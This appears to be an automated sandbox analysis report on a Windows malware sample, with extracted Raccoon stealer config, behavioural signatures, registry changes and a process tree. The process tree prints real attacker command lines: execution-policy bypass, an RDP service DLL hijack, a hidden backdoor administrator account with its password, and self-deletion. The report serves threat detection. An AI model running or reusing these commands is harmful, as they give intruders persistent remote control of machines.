Analysis
-
max time kernel
73s -
max time network
134s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
02-06-2021 17:28
Static task
static1
Behavioral task
behavioral1
Sample
e9f7040390e3052baacd0e25e6186e01.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
e9f7040390e3052baacd0e25e6186e01.exe
Resource
win10v20210408
General
-
Target
e9f7040390e3052baacd0e25e6186e01.exe
-
Size
567KB
-
MD5
e9f7040390e3052baacd0e25e6186e01
-
SHA1
f0df3a95add27f0c8482a33fb3ee2998a73adfb3
-
SHA256
2c5105d428486ab9bd43df850f2b74e9250769976662bc9937128ce0ff6257b0
-
SHA512
6e3fa85236d0b75fe59d31749ab3e8bfab3652813a71575244f8b3e2312df4eca6a14c54612223b98bee31922aa78b00df71824b0208f64744661c5693282263
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
raccoon
e46634757936706c1ff491585768dd6fe231db30
-
url4cnc
https://tttttt.me/jdiamond13
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 20 3992 powershell.exe 22 3992 powershell.exe 23 3992 powershell.exe 24 3992 powershell.exe 26 3992 powershell.exe 28 3992 powershell.exe 30 3992 powershell.exe 32 3992 powershell.exe 34 3992 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
b2EP0a91ph.exepid process 1972 b2EP0a91ph.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 3 IoCs
Processes:
e9f7040390e3052baacd0e25e6186e01.exepid process 808 e9f7040390e3052baacd0e25e6186e01.exe 3112 3112 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5420.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI53B0.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_xgsdbdpn.px5.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5312.tmp powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_drytqczp.dbv.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI53C0.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI53F0.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2272 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 26 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2052 powershell.exe 2052 powershell.exe 2052 powershell.exe 1148 powershell.exe 1148 powershell.exe 1148 powershell.exe 3100 powershell.exe 3100 powershell.exe 3100 powershell.exe 3348 powershell.exe 3348 powershell.exe 3348 powershell.exe 2052 powershell.exe 2052 powershell.exe 2052 powershell.exe 3992 powershell.exe 3992 powershell.exe 3992 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 624 624 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2052 powershell.exe Token: SeDebugPrivilege 1148 powershell.exe Token: SeIncreaseQuotaPrivilege 1148 powershell.exe Token: SeSecurityPrivilege 1148 powershell.exe Token: SeTakeOwnershipPrivilege 1148 powershell.exe Token: SeLoadDriverPrivilege 1148 powershell.exe Token: SeSystemProfilePrivilege 1148 powershell.exe Token: SeSystemtimePrivilege 1148 powershell.exe Token: SeProfSingleProcessPrivilege 1148 powershell.exe Token: SeIncBasePriorityPrivilege 1148 powershell.exe Token: SeCreatePagefilePrivilege 1148 powershell.exe Token: SeBackupPrivilege 1148 powershell.exe Token: SeRestorePrivilege 1148 powershell.exe Token: SeShutdownPrivilege 1148 powershell.exe Token: SeDebugPrivilege 1148 powershell.exe Token: SeSystemEnvironmentPrivilege 1148 powershell.exe Token: SeRemoteShutdownPrivilege 1148 powershell.exe Token: SeUndockPrivilege 1148 powershell.exe Token: SeManageVolumePrivilege 1148 powershell.exe Token: 33 1148 powershell.exe Token: 34 1148 powershell.exe Token: 35 1148 powershell.exe Token: 36 1148 powershell.exe Token: SeDebugPrivilege 3100 powershell.exe Token: SeIncreaseQuotaPrivilege 3100 powershell.exe Token: SeSecurityPrivilege 3100 powershell.exe Token: SeTakeOwnershipPrivilege 3100 powershell.exe Token: SeLoadDriverPrivilege 3100 powershell.exe Token: SeSystemProfilePrivilege 3100 powershell.exe Token: SeSystemtimePrivilege 3100 powershell.exe Token: SeProfSingleProcessPrivilege 3100 powershell.exe Token: SeIncBasePriorityPrivilege 3100 powershell.exe Token: SeCreatePagefilePrivilege 3100 powershell.exe Token: SeBackupPrivilege 3100 powershell.exe Token: SeRestorePrivilege 3100 powershell.exe Token: SeShutdownPrivilege 3100 powershell.exe Token: SeDebugPrivilege 3100 powershell.exe Token: SeSystemEnvironmentPrivilege 3100 powershell.exe Token: SeRemoteShutdownPrivilege 3100 powershell.exe Token: SeUndockPrivilege 3100 powershell.exe Token: SeManageVolumePrivilege 3100 powershell.exe Token: 33 3100 powershell.exe Token: 34 3100 powershell.exe Token: 35 3100 powershell.exe Token: 36 3100 powershell.exe Token: SeDebugPrivilege 3348 powershell.exe Token: SeIncreaseQuotaPrivilege 3348 powershell.exe Token: SeSecurityPrivilege 3348 powershell.exe Token: SeTakeOwnershipPrivilege 3348 powershell.exe Token: SeLoadDriverPrivilege 3348 powershell.exe Token: SeSystemProfilePrivilege 3348 powershell.exe Token: SeSystemtimePrivilege 3348 powershell.exe Token: SeProfSingleProcessPrivilege 3348 powershell.exe Token: SeIncBasePriorityPrivilege 3348 powershell.exe Token: SeCreatePagefilePrivilege 3348 powershell.exe Token: SeBackupPrivilege 3348 powershell.exe Token: SeRestorePrivilege 3348 powershell.exe Token: SeShutdownPrivilege 3348 powershell.exe Token: SeDebugPrivilege 3348 powershell.exe Token: SeSystemEnvironmentPrivilege 3348 powershell.exe Token: SeRemoteShutdownPrivilege 3348 powershell.exe Token: SeUndockPrivilege 3348 powershell.exe Token: SeManageVolumePrivilege 3348 powershell.exe Token: 33 3348 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
e9f7040390e3052baacd0e25e6186e01.execmd.exeb2EP0a91ph.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 808 wrote to memory of 1972 808 e9f7040390e3052baacd0e25e6186e01.exe b2EP0a91ph.exe PID 808 wrote to memory of 1972 808 e9f7040390e3052baacd0e25e6186e01.exe b2EP0a91ph.exe PID 808 wrote to memory of 3364 808 e9f7040390e3052baacd0e25e6186e01.exe cmd.exe PID 808 wrote to memory of 3364 808 e9f7040390e3052baacd0e25e6186e01.exe cmd.exe PID 808 wrote to memory of 3364 808 e9f7040390e3052baacd0e25e6186e01.exe cmd.exe PID 3364 wrote to memory of 2272 3364 cmd.exe timeout.exe PID 3364 wrote to memory of 2272 3364 cmd.exe timeout.exe PID 3364 wrote to memory of 2272 3364 cmd.exe timeout.exe PID 1972 wrote to memory of 2052 1972 b2EP0a91ph.exe powershell.exe PID 1972 wrote to memory of 2052 1972 b2EP0a91ph.exe powershell.exe PID 2052 wrote to memory of 3240 2052 powershell.exe csc.exe PID 2052 wrote to memory of 3240 2052 powershell.exe csc.exe PID 3240 wrote to memory of 3708 3240 csc.exe cvtres.exe PID 3240 wrote to memory of 3708 3240 csc.exe cvtres.exe PID 2052 wrote to memory of 1148 2052 powershell.exe powershell.exe PID 2052 wrote to memory of 1148 2052 powershell.exe powershell.exe PID 2052 wrote to memory of 3100 2052 powershell.exe powershell.exe PID 2052 wrote to memory of 3100 2052 powershell.exe powershell.exe PID 2052 wrote to memory of 3348 2052 powershell.exe powershell.exe PID 2052 wrote to memory of 3348 2052 powershell.exe powershell.exe PID 2052 wrote to memory of 1504 2052 powershell.exe reg.exe PID 2052 wrote to memory of 1504 2052 powershell.exe reg.exe PID 2052 wrote to memory of 2076 2052 powershell.exe reg.exe PID 2052 wrote to memory of 2076 2052 powershell.exe reg.exe PID 2052 wrote to memory of 2940 2052 powershell.exe reg.exe PID 2052 wrote to memory of 2940 2052 powershell.exe reg.exe PID 2052 wrote to memory of 2284 2052 powershell.exe net.exe PID 2052 wrote to memory of 2284 2052 powershell.exe net.exe PID 2284 wrote to memory of 2680 2284 net.exe net1.exe PID 2284 wrote to memory of 2680 2284 net.exe net1.exe PID 2052 wrote to memory of 3240 2052 powershell.exe cmd.exe PID 2052 wrote to memory of 3240 2052 powershell.exe cmd.exe PID 3240 wrote to memory of 3144 3240 cmd.exe cmd.exe PID 3240 wrote to memory of 3144 3240 cmd.exe cmd.exe PID 3144 wrote to memory of 2252 3144 cmd.exe net.exe PID 3144 wrote to memory of 2252 3144 cmd.exe net.exe PID 2252 wrote to memory of 2700 2252 net.exe net1.exe PID 2252 wrote to memory of 2700 2252 net.exe net1.exe PID 2052 wrote to memory of 544 2052 powershell.exe cmd.exe PID 2052 wrote to memory of 544 2052 powershell.exe cmd.exe PID 544 wrote to memory of 3272 544 cmd.exe cmd.exe PID 544 wrote to memory of 3272 544 cmd.exe cmd.exe PID 3272 wrote to memory of 808 3272 cmd.exe net.exe PID 3272 wrote to memory of 808 3272 cmd.exe net.exe PID 808 wrote to memory of 2620 808 net.exe net1.exe PID 808 wrote to memory of 2620 808 net.exe net1.exe PID 1632 wrote to memory of 3660 1632 cmd.exe net.exe PID 1632 wrote to memory of 3660 1632 cmd.exe net.exe PID 3660 wrote to memory of 2016 3660 net.exe net1.exe PID 3660 wrote to memory of 2016 3660 net.exe net1.exe PID 3844 wrote to memory of 3708 3844 cmd.exe net.exe PID 3844 wrote to memory of 3708 3844 cmd.exe net.exe PID 3708 wrote to memory of 2272 3708 net.exe net1.exe PID 3708 wrote to memory of 2272 3708 net.exe net1.exe PID 3180 wrote to memory of 3432 3180 cmd.exe net.exe PID 3180 wrote to memory of 3432 3180 cmd.exe net.exe PID 3432 wrote to memory of 2884 3432 net.exe net1.exe PID 3432 wrote to memory of 2884 3432 net.exe net1.exe PID 3344 wrote to memory of 2768 3344 cmd.exe net.exe PID 3344 wrote to memory of 2768 3344 cmd.exe net.exe PID 2768 wrote to memory of 1204 2768 net.exe net1.exe PID 2768 wrote to memory of 1204 2768 net.exe net1.exe PID 1408 wrote to memory of 3500 1408 cmd.exe net.exe PID 1408 wrote to memory of 3500 1408 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e9f7040390e3052baacd0e25e6186e01.exe"C:\Users\Admin\AppData\Local\Temp\e9f7040390e3052baacd0e25e6186e01.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\b2EP0a91ph.exe"C:\Users\Admin\AppData\Local\Temp\b2EP0a91ph.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wqatwvkc\wqatwvkc.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD03.tmp" "c:\Users\Admin\AppData\Local\Temp\wqatwvkc\CSC446953FD1A4041BE8C3F48E23DEBDDFA.TMP"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f4⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\e9f7040390e3052baacd0e25e6186e01.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc 6O7xHmag /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc 6O7xHmag /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 6O7xHmag /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc 6O7xHmag1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc 6O7xHmag2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 6O7xHmag3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
